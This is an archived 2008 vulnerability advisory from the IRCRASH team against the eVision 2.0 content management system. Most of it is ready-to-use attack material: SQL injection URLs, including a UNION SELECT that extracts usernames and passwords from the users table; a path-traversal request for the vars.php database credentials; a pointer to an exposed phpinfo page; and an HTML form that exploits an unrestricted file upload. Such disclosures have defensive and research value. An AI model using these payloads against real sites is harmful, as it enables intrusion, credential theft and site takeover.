eVision 2.0 Sql Injection/Remote File Disclosure/Remote File Upload/IG

2008-08-04T00:00:00
ID SECURITYVULNS:DOC:20285
Type securityvulns
Reporter Securityvulns
Modified 2008-08-04T00:00:00

Description

eVision 2.0 Sql Injection/Remote File Disclosure/Remote File Upload/IG

AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))

Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))

Our Site : Http://IRCRASH.COM

IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)

Script Download : http://mesh.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz

DORK : :(

[Sql Injection]

Blind : http://Site/print.php?id=1'+and+1=1/*

http://Site/style.php?template=1&module='+union+select+concat_ws(0x7c,username,pass)+from+users/*

User : http://Site/iframe.php?field=username&module=users/*

Pass : http://Site/iframe.php?field=pass&module=users/*

[IG]

http://Site/admin/phpinfo.php

[Remote File Disclosure]

http://Site/admin/show_img.php?type=text/plain&img=File

Ex. http://Site/admin/show_img.php?type=text/plain&img=../vars.php [Get database user & pass]

[Remote File Upload]

Exploit :

<html>

<!--

Powered by : IrCrash (R3d.W0rm(Sina Yazdanmehr)) #

Http://IrCrash.Com

//-->

<form action='http://[Site]/admin/x_image.php?type=background' method=post enctype=multipart/form-data>

<input type=file name='file_upload'>

<input type=hidden name=insert value=1>

<input type=hidden name=s_rc value='file://'>

<input type=submit>

</form>

</html>

Site : Http://IRCRASH.COM

################################ TNX GOD